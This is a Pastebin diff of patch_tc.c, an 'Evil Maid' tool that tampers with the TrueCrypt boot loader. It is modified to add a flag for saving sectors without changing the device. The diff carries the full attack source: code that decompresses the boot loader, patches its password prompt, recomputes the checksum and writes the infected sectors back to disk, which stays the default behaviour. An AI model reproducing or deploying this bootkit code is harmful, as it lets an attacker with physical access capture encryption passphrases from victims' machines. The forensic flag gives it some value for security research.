Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --- patch_tc.c 2009-10-13 20:06:07.000000000 +0200
- +++ patch_tc_modified.c 2014-03-23 22:14:49.073346732 +0100
- @@ -1,3 +1,13 @@
- +/*
- + Original blog post: http://theinvisiblethings.blogspot.nl/2009/10/evil-maid-goes-after-truecrypt.html
- + Original src download: http://invisiblethingslab.com/resources/evilmaid/evilmaid-src-1.0.tgz
- + Original Author: Joanna Rutkowska
- + Modified by: DiabloHorn
- +
- + Slight modification to permit the saving of the sectors and the unzipped
- + second loader without modifying the original image / device
- +*/
- +
- #include <stdio.h>
- #include <stdlib.h>
- #include <fcntl.h>
- @@ -16,6 +26,7 @@
- typedef enum {FALSE = 0, TRUE} bool;
- +int do_forensically = 0;
- bool SaveSectors (
- void* Sectors,
- @@ -217,10 +228,12 @@
- return FALSE;
- uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
- +
- if (uCompressedLoaderSize > (uSectorsCount - 5) * SECTOR_SIZE)
- return FALSE;
- uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedLoaderSize);
- +
- if (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] != uChecksum)
- return FALSE;
- @@ -259,7 +272,7 @@
- uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
- printf ("PatchTrueCrypt(): Compressed loader size: %d bytes\n", uCompressedLoaderSize);
- -
- + printf ("PatchTrueCrypt(): Saved checksum 0x%X\n", (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET]));
- // in MBR:
- // B9 FF XX mov cx, 0xXXff ; TC_BOOT_MEMORY_REQUIRED * 1024 - TC_COM_EXECUTABLE_OFFSET - 1
- @@ -297,124 +310,125 @@
- }
- printf ("PatchTrueCrypt(): Decompression successful\n");
- + if(!do_forensically){
- + hDecompressedLoader = open (LOADER, O_RDONLY);
- + if (hDecompressedLoader < 0) {
- + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- + return FALSE;
- + }
- +
- + if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
- + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- + uDecompressedLoaderSize = FileStatStruct.st_size;
- +
- + printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
- +
- + if (uDecompressedLoaderSize > uLoaderMemorySize) {
- + printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- +
- + pDecompressedLoader = malloc (uLoaderMemorySize);
- + if (!pDecompressedLoader) {
- + printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- + memset (pDecompressedLoader, 0, uLoaderMemorySize);
- +
- + nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
- + if (nbRead != uDecompressedLoaderSize) {
- + printf
- + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
- + errno);
- + free (pDecompressedLoader);
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- - hDecompressedLoader = open (LOADER, O_RDONLY);
- - if (hDecompressedLoader < 0) {
- - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- - return FALSE;
- - }
- -
- - if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
- - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- - uDecompressedLoaderSize = FileStatStruct.st_size;
- -
- - printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
- -
- - if (uDecompressedLoaderSize > uLoaderMemorySize) {
- - printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- -
- - pDecompressedLoader = malloc (uLoaderMemorySize);
- - if (!pDecompressedLoader) {
- - printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- - memset (pDecompressedLoader, 0, uLoaderMemorySize);
- -
- - nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
- - if (nbRead != uDecompressedLoaderSize) {
- - printf
- - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
- - errno);
- - free (pDecompressedLoader);
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- -
- -
- - close (hDecompressedLoader);
- - unlink (LOADER);
- -
- -/*
- - if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
- - return FALSE;
- - }
- -*/
- -
- - pUncompressedPatchedLoader = NULL;
- - uPatchedLoaderMemorySize = 0;
- - if (!PatchAskPassword
- - (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
- - pbAlreadyInfected)) {
- - printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
- - free (pDecompressedLoader);
- - return FALSE;
- - }
- -
- - free (pDecompressedLoader);
- - *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
- - ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
- -
- - if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
- - free (pUncompressedPatchedLoader);
- - return FALSE;
- - }
- -
- - free (pUncompressedPatchedLoader);
- -
- - unlink (PATCHED_LOADER_COMPRESSED);
- -
- - printf ("PatchTrueCrypt(): Compressing the patched loader\n");
- -
- - if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
- - printf ("PatchTrueCrypt(): Compression failed\n");
- - return FALSE;
- - }
- -
- - printf ("PatchTrueCrypt(): Compression successful\n");
- -
- - hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
- - if (hCompressedPatchedLoader < 0) {
- - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- - return FALSE;
- - }
- -
- - if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
- - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- - close (hCompressedPatchedLoader);
- - return FALSE;
- - }
- - uCompressedPatchedLoaderSize = FileStatStruct.st_size;
- -
- -
- - printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
- + close (hDecompressedLoader);
- + unlink (LOADER);
- +
- - nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
- - if (nbRead != uCompressedPatchedLoaderSize) {
- - printf
- - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
- - errno);
- - close (hCompressedPatchedLoader);
- - return FALSE;
- - }
- + /*
- + if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
- + return FALSE;
- + }
- + */
- +
- + pUncompressedPatchedLoader = NULL;
- + uPatchedLoaderMemorySize = 0;
- + if (!PatchAskPassword
- + (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
- + pbAlreadyInfected)) {
- + printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
- + free (pDecompressedLoader);
- + return FALSE;
- + }
- +
- + free (pDecompressedLoader);
- +
- + *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
- + ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
- +
- + if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
- + free (pUncompressedPatchedLoader);
- + return FALSE;
- + }
- +
- + free (pUncompressedPatchedLoader);
- +
- + unlink (PATCHED_LOADER_COMPRESSED);
- +
- + printf ("PatchTrueCrypt(): Compressing the patched loader\n");
- +
- + if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
- + printf ("PatchTrueCrypt(): Compression failed\n");
- + return FALSE;
- + }
- +
- + printf ("PatchTrueCrypt(): Compression successful\n");
- +
- + hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
- + if (hCompressedPatchedLoader < 0) {
- + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- + return FALSE;
- + }
- +
- + if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
- + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- + close (hCompressedPatchedLoader);
- + return FALSE;
- + }
- + uCompressedPatchedLoaderSize = FileStatStruct.st_size;
- +
- +
- + printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
- +
- + nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
- + if (nbRead != uCompressedPatchedLoaderSize) {
- + printf
- + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
- + errno);
- + close (hCompressedPatchedLoader);
- + return FALSE;
- + }
- - close (hCompressedPatchedLoader);
- - unlink (PATCHED_LOADER_COMPRESSED);
- + close (hCompressedPatchedLoader);
- + unlink (PATCHED_LOADER_COMPRESSED);
- - uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
- - printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
- -
- - *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
- - *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
- + uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
- + printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
- + *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
- + *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
- + }
- return TRUE;
- }
- @@ -458,11 +472,15 @@
- printf (VER_STRING);
- - if (argc != 2) {
- + if (argc < 2) {
- printf ("Usage: %s <target>\n", argv[0]);
- return 1;
- }
- -
- +
- + if( argc == 3){
- + do_forensically = 1;
- + }
- +
- if (!ReadFirstSectors (argv[1], SECTORS_TO_BACKUP, (char**)&pFirstSectors, &hDevice)) {
- return 2;
- }
- @@ -499,24 +517,25 @@
- return 5;
- }
- }
- + if(!do_forensically){
- + lseek (hDevice, 0, SEEK_SET);
- - lseek (hDevice, 0, SEEK_SET);
- -
- - nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
- - if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
- - printf ("Failed to update the first sectors of a device, last error %d\n", errno);
- - close (hDevice);
- - //unlink (szBackupName);
- - return FALSE;
- - }
- -
- -/* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
- - printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
- - free (pFirstSectors);
- - close (hDevice);
- - return;
- - }
- -*/
- + nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
- + if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
- + printf ("Failed to update the first sectors of a device, last error %d\n", errno);
- + close (hDevice);
- + //unlink (szBackupName);
- + return FALSE;
- + }
- +
- + /* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
- + printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
- + free (pFirstSectors);
- + close (hDevice);
- + return;
- + }
- + */
- + }
- free (pFirstSectors);
- close (hDevice);
- return 0;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement